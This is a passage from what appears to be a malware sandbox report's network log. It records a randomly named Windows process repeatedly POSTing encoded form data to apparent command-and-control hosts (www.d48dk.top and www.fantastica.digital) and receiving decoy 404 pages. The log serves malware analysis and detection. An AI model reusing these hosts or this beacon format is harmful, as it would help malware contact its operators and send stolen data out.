                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 43 64 50 4f 32 42 78 79 57 4a 56 69 79 33 5a 69 36 67 57 4b 4e 4b 64 32 4a 46 39 68 74 31 37 68 52 49 73 49 4a 34 4a 71 5a 4a 4e 69 56 4b 62 4f 47 6b 4e 6f 4e 48 4a 2b 41 6c 4d 56 42 6a 39 71 69 62 6b 69 33 66 64 43 78 78 71 4e 4e 77 4b 4c 34 6d 6d 44 50 75 52 53 76 45 6f 57 39 7a 4c 53 51 4d 37 48 50 4e 4b 67 58 6d 70 7a 64 67 48 59 56 4b 6d 57 53 79 4b 74 70 39 49 2f 6b 74 74 57 58 36 69 54 4c 50 54 62 49 47 48 77 66 74 30 46 48 6d 63 41 79 67 79 6f 32 35 2f 6b 30 56 52 55 74 51 6f 49 78 70 73 61 74 6b 75 36 52 6b 31 6c 44 7a 48 39 55 71 31 67 62 69 34 3d
                                                                    Data Ascii: dpy4vDKP=GjUoaQXlblkLCdPO2BxyWJViy3Zi6gWKNKd2JF9ht17hRIsIJ4JqZJNiVKbOGkNoNHJ+AlMVBj9qibki3fdCxxqNNwKL4mmDPuRSvEoW9zLSQM7HPNKgXmpzdgHYVKmWSyKtp9I/kttWX6iTLPTbIGHwft0FHmcAygyo25/k0VRUtQoIxpsatku6Rk1lDzH9Uq1gbi4=
                                                                    Dec 5, 2024 09:46:46.680783033 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:46 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.849759154.23.184.207805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:47.818855047 CET788OUTPOST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 44 2b 6e 4f 36 43 70 79 48 35 56 68 39 58 5a 69 6a 51 57 4f 4e 4b 52 32 4a 42 4e 78 74 44 54 68 52 71 6b 49 4b 36 68 71 61 4a 4e 69 66 71 62 50 62 30 4d 46 4e 47 30 44 41 6b 77 56 42 6e 56 71 69 65 59 69 33 75 64 42 33 68 71 44 46 51 4b 4a 31 47 6d 44 50 75 52 53 76 45 73 34 39 7a 44 53 4d 76 6a 48 56 73 4b 6a 55 6d 70 77 63 67 48 59 43 36 6d 53 53 79 4c 58 70 2f 73 42 6b 76 6c 57 58 37 53 54 4c 36 76 59 42 47 47 61 62 74 31 67 42 48 78 2f 79 51 4b 72 38 59 61 43 2f 6b 4a 58 73 6d 5a 69 72 4c 6b 63 75 6b 47 52 52 6e 64 54 47 45 61 56 4f 4a 6c 51 46 31 75 64 73 59 57 56 4c 35 36 44 2b 6d 6e 2f 58 4e 54 42 65 5a 64 6b
                                                                    Data Ascii: dpy4vDKP=GjUoaQXlblkLD+nO6CpyH5Vh9XZijQWONKR2JBNxtDThRqkIK6hqaJNifqbPb0MFNG0DAkwVBnVqieYi3udB3hqDFQKJ1GmDPuRSvEs49zDSMvjHVsKjUmpwcgHYC6mSSyLXp/sBkvlWX7STL6vYBGGabt1gBHx/yQKr8YaC/kJXsmZirLkcukGRRndTGEaVOJlQF1udsYWVL56D+mn/XNTBeZdk
                                                                    Dec 5, 2024 09:46:49.339220047 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:49 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.849760154.23.184.207805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:50.479295969 CET1805OUTPOST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 44 2b 6e 4f 36 43 70 79 48 35 56 68 39 58 5a 69 6a 51 57 4f 4e 4b 52 32 4a 42 4e 78 74 44 72 68 52 35 38 49 4b 64 39 71 62 4a 4e 69 42 36 62 43 62 30 4d 39 4e 48 63 48 41 6b 38 46 42 68 52 71 74 63 67 69 78 63 31 42 2b 68 71 44 61 67 4b 55 34 6d 6e 5a 50 75 68 57 76 46 63 34 39 7a 44 53 4d 75 54 48 44 74 4b 6a 53 6d 70 7a 64 67 48 4d 56 4b 6d 36 53 32 76 74 70 2f 6f 52 6e 65 46 57 58 62 43 54 62 63 37 59 4f 47 48 38 63 74 31 43 42 48 39 65 79 51 6d 52 38 59 76 6e 2f 6a 6c 58 68 78 42 34 7a 35 34 35 74 69 47 32 64 45 34 79 65 30 4b 59 46 6f 4a 7a 49 6c 7a 2f 74 50 2b 59 4f 71 4b 38 31 42 32 4c 4e 4a 50 5a 59 4a 4d 32 6d 49 35 56 70 43 51 76 68 41 35 6a 53 76 56 56 63 37 48 6c 53 70 6f 47 46 2f 58 35 2b 59 76 4a 59 30 79 6f 59 39 4b 41 77 48 56 4e 36 57 52 36 38 77 6c 2b 34 79 53 62 67 49 73 32 2b 43 77 4b 58 58 6b 39 41 59 34 41 59 36 7a 70 32 42 32 75 6a 6c 37 4d 44 45 2f 4a 72 59 35 62 55 47 69 54 47 50 31 76 78 43 76 63 7a 6a 2f 2b 43 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=GjUoaQXlblkLD+nO6CpyH5Vh9XZijQWONKR2JBNxtDrhR58IKd9qbJNiB6bCb0M9NHcHAk8FBhRqtcgixc1B+hqDagKU4mnZPuhWvFc49zDSMuTHDtKjSmpzdgHMVKm6S2vtp/oRneFWXbCTbc7YOGH8ct1CBH9eyQmR8Yvn/jlXhxB4z545tiG2dE4ye0KYFoJzIlz/tP+YOqK81B2LNJPZYJM2mI5VpCQvhA5jSvVVc7HlSpoGF/X5+YvJY0yoY9KAwHVN6WR68wl+4ySbgIs2+CwKXXk9AY4AY6zp2B2ujl7MDE/JrY5bUGiTGP1vxCvczj/+C1tlT/Xzzn1vl5N/dts6vkdLVg16a8fPCeaCee09lxG2YJvnPsTb9p7Jmo3GBuI8/+Lq83xnhyypXjozGZ4zfmXaxGxXk5uTwQMJPObZ2cW3jmDMMHcRwMEDehJ5T5RmnwP+xwIOHo+YytjE7hkSh5pIk267hyYY24e6TndYppbJdI3nruO68FV0P9YgJmgc9pJPD02OS5k95AgpE46+phnyTZ3Qisv/hVhf3b/3CZijwUgRDKwfchC+68DV7TmBJ3QWKoFTSRQGA0h06fPhU9eZGKI/rUZunUQOCv8GN5eZKEiSDN95qv9D/a2iy3uLB9yZxoKuamWbtMJYTqfG+TLJcwPtBzxsDW7zNUU7vsMp84XeTalTyAK0BJiSUKiybH0LRpI+vg8bdCGjw9DhVe2yWPTX47IgVUIrKc63tBu6Bpaykc1FpTUj7b6x54VPMo8RMzt07otZzAc7+8IGYmEY5owc7d1UAVwZDV00q976BrjpLeCTGwyVW+0YCiju3h/rTcOFsH0AUNRU9QnOk8m9XWYsxlzyK4Vq4nWDnqiCdw521LW26IZHhdIMXCtFXooXEKw0WfcbQl7OWuQV5BE/qJYYJeHKRsnXXuqDlWr9iJJFykYpb8FE0BkRYCQurUstaGtc3SG+Wakz0tGw4dJ9kcAZGaJCx7X [TRUNCATED]
                                                                    Dec 5, 2024 09:46:52.001822948 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:51 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.849761154.23.184.207805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:53.139818907 CET514OUTGET /e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.d48dk.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:54.675735950 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:54 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.849762194.58.112.174805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:47:00.526082993 CET795OUTPOST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 37 58 4f 4d 42 44 43 79 44 48 4a 69 68 55 54 6e 6b 2f 67 65 52 68 48 49 78 6c 4a 75 32 6b 69 47 6f 38 52 73 45 61 4e 7a 51 74 79 50 53 43 57 76 70 72 50 34 39 53 58 52 59 30 7a 65 38 38 6f 39 4c 71 6c 4f 57 32 41 77 46 4f 35 72 47 65 6f 6b 64 59 6a 46 6e 49 4d 4d 61 51 4b 62 77 46 4c 31 57 34 59 78 32 79 75 64 49 68 38 44 6f 55 6f 2f 6e 35 6b 59 67 37 6c 37 36 6e 62 54 55 6d 74 37 62 58 46 49 6e 4d 33 68 6a 70 75 5a 32 57 6c 4d 42 36 68 6e 6d 4e 79 4f 4a 4c 58 73 4e 68 38 69 78 4c 79 4d 4a 77 71 47 71 70 58 44 4c 50 2b 30 50 56 62 73 4d 32 4b 44 69 2f 49 3d
                                                                    Data Ascii: dpy4vDKP=I/oBKjKkNFgq7XOMBDCyDHJihUTnk/geRhHIxlJu2kiGo8RsEaNzQtyPSCWvprP49SXRY0ze88o9LqlOW2AwFO5rGeokdYjFnIMMaQKbwFL1W4Yx2yudIh8DoUo/n5kYg7l76nbTUmt7bXFInM3hjpuZ2WlMB6hnmNyOJLXsNh8ixLyMJwqGqpXDLP+0PVbsM2KDi/I=
                                                                    Dec 5, 2024 09:47:01.837007999 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:01 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Dec 5, 2024 09:47:01.837025881 CET1236INData Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Dec 5, 2024 09:47:01.837044954 CET1202INData Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.849763194.58.112.174805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:47:03.727638960 CET815OUTPOST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 70 48 65 4d 44 67 61 79 4c 48 4a 68 38 6b 54 6e 74 66 67 53 52 68 37 49 78 68 52 2b 32 33 47 47 70 5a 74 73 46 66 68 7a 54 74 79 50 4b 53 57 71 6b 4c 50 78 39 54 72 76 59 31 66 65 38 38 73 39 4c 71 31 4f 57 46 6f 7a 44 65 35 54 48 75 6f 6d 53 34 6a 46 6e 49 4d 4d 61 52 72 4d 77 46 44 31 57 4a 49 78 33 54 75 65 46 42 38 45 70 55 6f 2f 74 5a 6c 54 67 37 6c 38 36 6c 6a 74 55 67 70 37 62 54 42 49 6e 39 33 69 74 5a 75 44 79 57 6c 66 51 4f 73 6f 6e 4f 4f 73 41 4e 54 41 4e 68 56 66 30 39 44 6d 54 53 69 41 70 70 2f 6f 4c 4d 57 43 4b 69 47 45 57 56 61 7a 38 6f 64 44 37 45 4d 71 70 4d 41 6f 70 37 47 54 4d 37 65 72 59 6d 65 6e
                                                                    Data Ascii: dpy4vDKP=I/oBKjKkNFgqpHeMDgayLHJh8kTntfgSRh7IxhR+23GGpZtsFfhzTtyPKSWqkLPx9TrvY1fe88s9Lq1OWFozDe5THuomS4jFnIMMaRrMwFD1WJIx3TueFB8EpUo/tZlTg7l86ljtUgp7bTBIn93itZuDyWlfQOsonOOsANTANhVf09DmTSiApp/oLMWCKiGEWVaz8odD7EMqpMAop7GTM7erYmen
                                                                    Dec 5, 2024 09:47:04.619647980 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:04 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Dec 5, 2024 09:47:04.619810104 CET1236INData Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Dec 5, 2024 09:47:04.619827032 CET1202INData Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.849764194.58.112.174805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:47:06.796376944 CET1832OUTPOST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
